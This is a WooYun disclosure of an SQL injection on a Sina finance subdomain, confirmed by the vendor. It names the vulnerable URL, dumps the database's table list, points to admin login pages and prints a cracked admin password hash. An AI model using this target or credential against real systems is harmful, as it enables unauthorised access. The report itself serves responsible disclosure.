当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041618

漏洞标题:新浪某分站SQL注入漏洞

相关厂商:新浪

漏洞作者: xiaoL

提交时间:2013-11-01 08:12

修复时间:2013-12-16 08:13

公开时间:2013-12-16 08:13

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-01: 细节已通知厂商并且等待厂商处理中
2013-11-01: 厂商已经确认,细节仅向厂商公开
2013-11-11: 细节向核心白帽子及相关领域专家公开
2013-11-21: 细节向普通白帽子公开
2013-12-01: 细节向实习白帽子公开
2013-12-16: 细节向公众公开

简要描述:

新浪某分站SQL注入...
存在一些乱七八糟的页面,还有...

详细说明:

http://biz.finance.sina.com.cn//meeting/showAllMeeting.php?year=2012
地址...

1.jpg


web application technology: Apache
back-end DBMS: MySQL 5
Database: biz
[383 tables]
+---------------------------------+
| CBCM_1 |
| CBCM_2 |
| CBCM_join |
| C_Exhi |
| StockRadarHistory |
| StockRadarMsg |
| TB_OBJECT_1010 |
| TB_OBJECT_1014 |
| TB_OBJECT_1016 |
| TB_OBJECT_1017 |
| TB_OBJECT_1018 |
| TB_OBJECT_1020 |
| TB_OBJECT_1021 |
| TB_OBJECT_1022 |
| TB_OBJECT_1023 |
| TB_OBJECT_1024 |
| TB_OBJECT_1039 |
| TB_OBJECT_1040 |
| TB_OBJECT_1070 |
| TB_OBJECT_1079 |
| TB_OBJECT_1084 |
| TB_OBJECT_1090 |
| TB_OBJECT_1091 |
| TB_OBJECT_1092 |
| TB_OBJECT_1093 |
| TB_OBJECT_1095 |
| TB_OBJECT_1099 |
| TB_OBJECT_1100 |
| TB_OBJECT_1101 |
| TB_OBJECT_1102 |
| TB_OBJECT_1103 |
| TB_OBJECT_1104 |
| TB_OBJECT_1114 |
| TB_OBJECT_1115 |
| TB_OBJECT_1125 |
| TB_OBJECT_1126 |
| TB_OBJECT_1127 |
| TB_OBJECT_1135 |
| TB_OBJECT_1136 |
| TB_OBJECT_1142 |
| TB_OBJECT_1143 |
| TB_OBJECT_1149 |
| TB_OBJECT_1151 |
| TB_OBJECT_1156 |
| TB_OBJECT_1158 |
| TB_OBJECT_1180 |
| TB_OBJECT_1214 |
| TB_OBJECT_1233 |
| TB_OBJECT_1245 |
| TB_OBJECT_1259 |
| TB_OBJECT_1260 |
| TB_OBJECT_1261 |
| TB_OBJECT_1272 |
| TB_OBJECT_1373 |
| TB_OBJECT_1399 |
| TB_OBJECT_1400 |
| TB_OBJECT_1402 |
| TB_OBJECT_1415 |
| TB_OBJECT_1426 |
| TB_OBJECT_1449 |
| TB_OBJECT_1673 |
| TB_OBJECT_1686 |
| TB_OBJECT_1714 |
| TB_OBJECT_1715 |
| aask_query |
| aask_teach |
| aask_tip |
| aba_info |
| aba_list |
| achieve_forecast |
| art_product |
| art_promulgator |
| asset_flow |
| bs_info |
| bs_intro |
| bs_news |
| bs_people_relation |
| bs_subsidiary_info |
| cffex_company |
| cffex_trade |
| cfjy |
| cgs_price |
| cgs_vote |
| cnpinyin |
| cnstock |
| coindaily |
| coininfo |
| coinquote |
| corporation |
| currencies |
| daily |
| data_close_info |
| data_hight_close_info |
| data_hsl |
| data_low_close_info |
| data_ltsz |
| data_lxzd |
| data_syl |
| data_talk |
| data_volume_five |
| data_zhsl |
| data_zzd |
| data_zzf |
| dict_hit |
| dict_user |
| dict_words |
| donation |
| dpool_check_db |
| dpps_host_backend_reg |
| dpps_loginlog |
| dpps_schedule |
| dpps_user |
| exhibition |
| finance_blogs |
| finance_event |
| finance_event_new |
| fltxsg |
| fltxsg2 |
| fltxsg3 |
| focus_everyday |
| forex |
| forexask_query |
| forexask_teach |
| forexask_tip |
| fq_daily |
| fu_ask_query |
| fu_ask_teach |
| fu_ask_tip |
| fund_huaxia |
| fund_info |
| fund_net_asset_value |
| fund_result |
| fundpre_corr_para |
| fundpre_corr_zhishu |
| fundpre_prof_info |
| future_info |
| futures_companyinfo |
| futures_trade |
| futures_trade_archive |
| futuresdaily |
| futureshq |
| futurestable |
| hf_admins |
| hf_photo |
| hf_users |
| hkstock |
| hkwarrant_data |
| hkwarrant_historical_data |
| hqtree |
| hqtree_admin |
| hqtree_del |
| hqtree_symbols |
| investment_concept |
| investment_future_reports |
| investment_hot |
| investment_indu_fcst |
| investment_induresearch_reports |
| investment_industrycare |
| investment_industrycare_gti |
| investment_macmorning_reports |
| investment_orgcare |
| investment_orgcare_distribution |
| investment_orgcare_gti |
| investment_pft |
| investment_rating |
| investment_rating_daily |
| investment_rating_daily_gti |
| investment_rating_gti |
| investment_rating_unstock |
| investment_reports |
| investment_strategy_reports |
| investment_sumprice |
| investment_sumprice_gti |
| investment_sumrating |
| investment_sumrating_gti |
| large_trade |
| lc_admin |
| lc_quest |
| lc_quests |
| lcmj |
| lipper |
| loofi_credit_card |
| luyan |
| market_size |
| media_data |
| meeting2_area |
| meeting2_city |
| meeting2_company_news |
| meeting2_event |
| meeting2_guest |
| meeting2_guest_news |
| meeting2_guest_pic |
| meeting2_guest_video |
| meeting2_news |
| meeting2_pic |
| meeting2_rbac |
| meeting2_rela_guest |
| meeting2_subject |
| meeting2_subject_guest1 |
| meeting2_subject_guest2 |
| meeting2_subject_keyword |
| meeting2_subject_news |
| meeting2_subject_org |
| meeting2_subject_pic |
| meeting2_subject_suborg |
| meeting2_subject_video |
| meeting2_underway |
| meeting2_video |
| meeting_guest |
| meeting_keyword |
| meeting_news |
| meeting_pic |
| meeting_rbac |
| meeting_rela_guest |
| meeting_subject |
| meeting_subject_guest1 |
| meeting_subject_guest2 |
| meeting_subject_org |
| meeting_subject_suborg |
| meeting_video |
| mergepeople |
| mobile |
| morning_reports_gxq |
| mscfjys |
| mslcmj |
| my_stock |
| news_mod_1 |
| news_mod_2 |
| news_mod_3 |
| news_mod_4 |
| news_mod_5 |
| news_mod_6 |
| news_mod_7 |
| news_mod_7_t |
| news_through |
| openfund |
| par_t255 |
| person_contribution |
| person_honor |
| person_main |
| person_main_book |
| person_news_fetch |
| person_news_num |
| person_organization |
| person_position |
| person_to_book |
| person_to_honor |
| person_to_org_and_pos |
| person_to_organization |
| person_to_position |
| person_top_news |
| pickup |
| player |
| put_select |
| put_select_wz |
| qmx_analystinfo |
| qmx_analystinfo_gti |
| qmx_analystorder |
| qmx_analystreports |
| qmx_eps |
| qmx_industry |
| qmx_industrystock |
| qmx_pe |
| qmx_reports |
| qmx_reports_gti |
| qmx_reports_summary_gti |
| qs |
| qsyyb |
| radar |
| relanews_all |
| relanews_ggdp |
| relanews_hydt |
| relanews_hyzx |
| relanews_mggs |
| relanews_sccw |
| relanews_xgpl |
| relanews_xgxw |
| remark |
| report_baogao |
| report_chanpin |
| report_chanpin_charge |
| report_dinggou |
| report_jigou |
| report_pic |
| report_sinauser |
| sdc_account |
| sdc_account2 |
| sp_t101 |
| sp_t106 |
| sp_t110 |
| sp_t122 |
| sp_t123 |
| sp_t124 |
| sp_t148 |
| sp_t156 |
| sp_t157 |
| sp_t158 |
| sp_t159 |
| sp_t160 |
| sp_t161 |
| sp_t162 |
| sp_t163 |
| sp_t164 |
| sp_t165 |
| sp_t166 |
| sp_t167 |
| sp_t168 |
| sp_t191 |
| sp_t236 |
| sp_t241 |
| sp_t246 |
| sp_t253 |
| sp_t255 |
| sp_t260 |
| sp_t265 |
| sp_t273 |
| sp_t279 |
| sp_t289 |
| sp_t45 |
| sp_t82 |
| sp_t95 |
| stamphistory |
| stampquote |
| stkrcmd_account |
| stkrcmd_con |
| stkrcmd_modify |
| stkrcmd_stock |
| szwtest |
| tb_BalanceSheet_Bank |
| tb_BalanceSheet_NonBank |
| tb_CPI |
| tb_CompanyProfile |
| tb_DJ |
| tb_EarningAnnouncement |
| tb_FinetNews |
| tb_GDP |
| tb_IPO |
| tb_IPOPro |
| tb_IncomeStatment_Bank |
| tb_IncomeStatment_NonBank |
| tb_Prospects |
| tb_RedChipsNews |
| tb_Research |
| tb_Retail |
| tb_Review |
| tb_SehkNews |
| tb_Trade |
| tb_Unemployment |
| tb_WorldwideIndex |
| tb_companyList |
| tb_daily |
| tb_yanbao |
| tb_yanbao_attr |
| teach |
| teach_bak |
| team |
| tech_spt253 |
| the_query |
| the_query_bak |
| topten_prepare |
| tt_double_data |
| tt_index |
| tt_multi_data |
| twstock |
| us_stock_recommend |
| usask |
| usask_black |
| usstock2 |
| usstock_blogs |
| usstock_blogs_auditing |
| usstock_news |
| zhuanlan |
| zjzt_answer |
| zjzt_answer_new |
| zjzt_black |
| zjzt_expert |
| zjzt_forex_answer |
| zjzt_forex_question |
| zjzt_question |
| zjzt_question_new |
| zjzt_tip |
| zjzt_us_answer |
| zjzt_us_question |
+---------------------------------+
另外问下:
http://biz.finance.sina.com.cn/lc/detail.php?id=47499
id 47497 - 47499 什么情况?

2.png


http://biz.finance.sina.com.cn/ask/power.php
登录地址?
另外还有一个专家登录地址,我不是专家,就算了!

漏洞证明:

如上...
MD5可破解
0d3e67b6219bf17bc56c2dc792922ba2
123admin!@#

修复方案:

过滤!

版权声明:转载请注明来源 xiaoL@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-11-01 11:07

厂商回复:

感谢关注新浪安全,马上安排相关人员修复

最新状态:

暂无


漏洞评价:

评论